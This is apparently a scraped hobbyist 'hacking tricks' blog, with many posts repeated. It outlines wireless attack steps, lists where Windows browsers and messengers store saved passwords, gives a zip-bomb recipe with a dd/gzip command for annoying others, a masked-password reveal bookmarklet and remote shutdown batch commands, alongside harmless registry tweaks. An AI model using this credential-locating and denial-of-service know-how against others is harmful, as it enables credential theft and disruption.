Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-
1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.
2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.
3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.
4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.
5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.
6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning
7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.
8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).
9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.
10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.
11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.
12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.
13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.
14) Wireless Network Probing :- The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.
15) AP Weaknesses :- APs have weaknesses that are both due to design mistakes and user interfaces
16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.
17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.
18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.
19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.
Tuesday, March 2, 2010
HOW TO ACCESS REGISTRY ??
HOW TO ACCESS REGISTRY ??
1. Goto Start Menu.
2. Click on Run.
3. Type "regedit" (without quotes) in the Run Box .After that this Windows Opens . Now you are ready to see that.
LOCATIONS OF SAVED PASSWORDS !
# Internet Explorer 4.00 - 6.00:
The passwords are stored in a secret location in the Registry known as the "Protected Storage".
The base key of the Protected Storage is located under the following key:
"HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider".
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.
# Internet Explorer 7.00 - 8.00:
The new versions of Internet Explorer stores the passwords in 2 different locations.
1. AutoComplete passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
2. HTTP Authentication passwords are stored in the Credentials file under
Documents and Settings\Application Data\Microsoft\Credentials
, together with login passwords of LAN computers and other passwords.
# Firefox:
The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in
[Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
# Google Chrome Web browser:
The passwords are stored in
[Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
(This filename is SQLite database which contains encrypted passwords and other stuff)
# Opera:
The passwords are stored in wand.dat filename, located under
[Windows Profile]\Application Data\Opera\Opera\profile
# Outlook Express (All Versions):
The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
# Outlook 98/2000:
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
# Outlook 2002-2008:
All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under
HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[ Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.
# Windows Live Mail:
All account settings, including the encrypted passwords, are stored in
[Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[ Account Name]
The account filename is an xml file with .oeaccount extension.
# ThunderBird:
The password file is located under
[Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.
# Google Talk:
All account settings, including the encrypted passwords, are stored in the Registry under
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[ Account Name]
# Google Desktop:
Email passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[ Account Name]
# MSN/Windows Messenger version 6.x and below:
The passwords are stored in one of the following locations:
1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
3. In the Credentials file, with entry named as "Passport.Net\\*". (Only when the OS is XP or more)
# MSN Messenger version 7.x:
The passwords are stored under
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[ Account Name]
# Windows Live Messenger version 8.x/9.x:
The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=".
# Yahoo Messenger 6.x:
The password is stored in the Registry, under
HKEY_CURRENT_USER\Software\Yahoo\Pager
("EOptions string" value)
# Yahoo Messenger 7.5 or later:
The password is stored in the Registry, under
HKEY_CURRENT_USER\Software\Yahoo\Pager - "ETS" value.
The value stored in "ETS" value cannot be recovered back to the original password.
# AIM Pro:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\AIM\AIMPRO\[ Account Name]
# AIM 6.x:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
# ICQ Lite 4.x/5.x/2003:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number]
(MainLocation value)
# ICQ 6.x:
The password hash is stored in
[Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
(The password hash cannot be recovered back to the original password)
# Digsby:
The main password of Digsby is stored in
[Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.
# PaltalkScene:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\Paltalk\[ Account Name].
1. Goto Start Menu.
2. Click on Run.
3. Type "regedit" (without quotes) in the Run Box .After that this Windows Opens . Now you are ready to see that.
LOCATIONS OF SAVED PASSWORDS !
# Internet Explorer 4.00 - 6.00:
The passwords are stored in a secret location in the Registry known as the "Protected Storage".
The base key of the Protected Storage is located under the following key:
"HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider".
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.
# Internet Explorer 7.00 - 8.00:
The new versions of Internet Explorer stores the passwords in 2 different locations.
1. AutoComplete passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
2. HTTP Authentication passwords are stored in the Credentials file under
Documents and Settings\Application Data\Microsoft\Credentials
, together with login passwords of LAN computers and other passwords.
# Firefox:
The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in
[Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
# Google Chrome Web browser:
The passwords are stored in
[Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
(This filename is SQLite database which contains encrypted passwords and other stuff)
# Opera:
The passwords are stored in wand.dat filename, located under
[Windows Profile]\Application Data\Opera\Opera\profile
# Outlook Express (All Versions):
The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
# Outlook 98/2000:
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
# Outlook 2002-2008:
All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under
HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[ Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.
# Windows Live Mail:
All account settings, including the encrypted passwords, are stored in
[Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[ Account Name]
The account filename is an xml file with .oeaccount extension.
# ThunderBird:
The password file is located under
[Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.
# Google Talk:
All account settings, including the encrypted passwords, are stored in the Registry under
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[ Account Name]
# Google Desktop:
Email passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[ Account Name]
# MSN/Windows Messenger version 6.x and below:
The passwords are stored in one of the following locations:
1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
3. In the Credentials file, with entry named as "Passport.Net\\*". (Only when the OS is XP or more)
# MSN Messenger version 7.x:
The passwords are stored under
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[ Account Name]
# Windows Live Messenger version 8.x/9.x:
The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=".
# Yahoo Messenger 6.x:
The password is stored in the Registry, under
HKEY_CURRENT_USER\Software\Yahoo\Pager
("EOptions string" value)
# Yahoo Messenger 7.5 or later:
The password is stored in the Registry, under
HKEY_CURRENT_USER\Software\Yahoo\Pager - "ETS" value.
The value stored in "ETS" value cannot be recovered back to the original password.
# AIM Pro:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\AIM\AIMPRO\[ Account Name]
# AIM 6.x:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
# ICQ Lite 4.x/5.x/2003:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number]
(MainLocation value)
# ICQ 6.x:
The password hash is stored in
[Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
(The password hash cannot be recovered back to the original password)
# Digsby:
The main password of Digsby is stored in
[Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.
# PaltalkScene:
The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\Paltalk\[ Account Name].
Watching Videos That Require Log In or SIGNUP without signing up
Hello Guys Welcome again. Today I am going to share a very useful and time saving trick for using YouTube.
That is "How to watch YouTube videos which Requires Login and Sign up". I am a hardcore user of you tube and most of times get this error that to watch this video you have to login or signup. So Today i am going to reveal the hack that How to watch YouTube videos without any registration or login...So read on...
Watching Videos That Require Log In or SIGNUP
Stepwise Description:
1. Suppose there is a video. Example as
http://www.youtube.com/watch?v=Q4WnNo4VE1I
2. Goto the above Url in New Window . You will see the following Window
3. Now you have seen clearly that above video requires LOGIN or SIGNUP.
Now We want to bypass that LOGIN or SIGNUP ERROR.
4. So Do the Following as Shown in FIGURE:
5. EDIT URL AS SHOW ABOVE that is replace the ? and = both by separate / and open the URL:
http://www.youtube.com/watch/v/Q4WnNo4VE1I
6. That's the End and You will be able to see video without LOGIN or SIGN UP.
THIS END's THE TUTORIAL . I THINK THAT YOU HAVE SURELY LIKE IT.
That is "How to watch YouTube videos which Requires Login and Sign up". I am a hardcore user of you tube and most of times get this error that to watch this video you have to login or signup. So Today i am going to reveal the hack that How to watch YouTube videos without any registration or login...So read on...
Watching Videos That Require Log In or SIGNUP
Stepwise Description:
1. Suppose there is a video. Example as
http://www.youtube.com/watch?v=Q4WnNo4VE1I
2. Goto the above Url in New Window . You will see the following Window
3. Now you have seen clearly that above video requires LOGIN or SIGNUP.
Now We want to bypass that LOGIN or SIGNUP ERROR.
4. So Do the Following as Shown in FIGURE:
5. EDIT URL AS SHOW ABOVE that is replace the ? and = both by separate / and open the URL:
http://www.youtube.com/watch/v/Q4WnNo4VE1I
6. That's the End and You will be able to see video without LOGIN or SIGN UP.
THIS END's THE TUTORIAL . I THINK THAT YOU HAVE SURELY LIKE IT.
Types of viruses :-
The different types of viruses are as follows-
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.
Examples of boot- sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .
Some common file viruses are Sunday, Cascade.
3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.
4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.
5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.
6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.
Examples of boot- sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .
Some common file viruses are Sunday, Cascade.
3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.
4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.
5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.
6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.
Tips for Wireless Home Network Security
1) Change Default Administrator Passwords (and Usernames)
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely
2) Turn on (Compatible) WPA / WEP Encryption
3) Change the Default SSID
4) Disable SSID Broadcast
5) Assign Static IP Addresses to Devices
6) Enable MAC Address Filtering
7) Turn Off the Network During Extended Periods of Non-Use
8) Position the Router or Access Point Safely
The ZIP of Death
This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.
1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes
4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
8) Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
1) Make a.txt file
2) Open and type the null character (alt + 255)
3) Press ctrl + a then ctrl + v a couple times to make some null bytes
4) If u have a hexeditor make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name accordinly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
8) Now every copy is made into a super copy and repeat
9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!
The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555
Just add some more and the file will expand amazingly
Make sure to not open this after
You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
Sitemeter Hack - Hide Visual Tracker (Counter)
Sitemeter, one of the best traffic counter for websites/blogs, it shows online users, Referrals (From where people coming to your site), country locations, browser etc etc.. all in detail.
This counter is visible to all visitors.
Invisible Counters (Tracker) is available for Premium Accounts Only…!
But you can easily hack to hide it.
Its just few setting changes which will work fine.
1) Login into your sitemeter account.
2) Go to ‘Manager’ from top menu.
3) Go to ‘Meter Style’ option from left hand menu.
4) Select 2nd last meter style (Counter, which shows simple numbers).previewmeter
5) Now in “DIGIT COLOR” select ‘Transparent’, Similarly in “BACKGROUND COLOR” select ‘Transparent’.
6) DONE.
Now your sitemeter counter is invisible from normal eyes in your site
Place it anywhere in your website/blog, and track your traffic, users.
Enjoy…..!
This counter is visible to all visitors.
Invisible Counters (Tracker) is available for Premium Accounts Only…!
But you can easily hack to hide it.
Its just few setting changes which will work fine.
1) Login into your sitemeter account.
2) Go to ‘Manager’ from top menu.
3) Go to ‘Meter Style’ option from left hand menu.
4) Select 2nd last meter style (Counter, which shows simple numbers).previewmeter
5) Now in “DIGIT COLOR” select ‘Transparent’, Similarly in “BACKGROUND COLOR” select ‘Transparent’.
6) DONE.
Now your sitemeter counter is invisible from normal eyes in your site
Place it anywhere in your website/blog, and track your traffic, users.
Enjoy…..!
Shutdown Command Via Command Prompt :-
The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.
To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.
The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.
-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)
Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.
Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.
shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.
shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.
Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.
In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.
Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-
shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s
Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.
When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.
You can use any combination of shutdown commands in a batch file.
To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.
The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.
-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)
Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.
Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.
shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.
shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.
Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.
In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.
Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-
shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s
Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
Pick the location to save the batch file in and save it.
When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.
You can use any combination of shutdown commands in a batch file.
Run Firefox inside Firefox
How to run Firefox inside Firefox.?
Yup you can run Firefox inside firefox just by typing following url.
How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!
copy paste following url in a web browser (mozilla firefox).
chrome://browser/content/browser.xul
Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-
Yup you can run Firefox inside firefox just by typing following url.
How about Opening Firefox inside Firefox which is again in another Firefox..?
Not bad huh?
And its really easy too just type in this url in Firefox's address bar and there you go!
Firefox inside Firefox!
copy paste following url in a web browser (mozilla firefox).
chrome://browser/content/browser.xul
Following is the screenshot of this trick (firefox in firefox in firefox, which is again in another firefox)-
Reveal *****(Asterisk) Passwords Using Javascript
Want to Reveal the Passwords Hidden Behind Asterisk (****) ?
Follow the steps given below-
1) Open the Login Page of any website. (eg. http://mail.yahoo.com)
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);
4) As soon as you press 'Enter', A window pops up showing Password typed by you..!
Note :- This trick may not be working with firefox.
Reveal Passwords Using Javascript
Follow the steps given below-
1) Open the Login Page of any website. (eg. http://mail.yahoo.com)
2) Type your 'Username' and 'Password'.
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.
javascript: alert(document.getElementById('Passwd').value);
4) As soon as you press 'Enter', A window pops up showing Password typed by you..!
Note :- This trick may not be working with firefox.
Reveal Passwords Using Javascript
Remove shortcut arrow from desktop icons completely
To remove shortcut arrow from desktop icons in any type of document:
a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.
b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.
c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.
4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.
6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and… Enjoy!
Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.
a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.
b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.
c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.
4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.
6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and… Enjoy!
Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.
Pop A Banner Each Time Windows Boots
o pop a banner which can contain any message you want to display just before a user is going to log on.
Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.
Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.
This can be effectively used to display the company's private policy each time the user logs on to his NT box.
It's '.reg' file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] "LegalNoticeCaption"="Caption here."
Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.
Now create yet another new string value and name it:
'LegalNoticeText'.
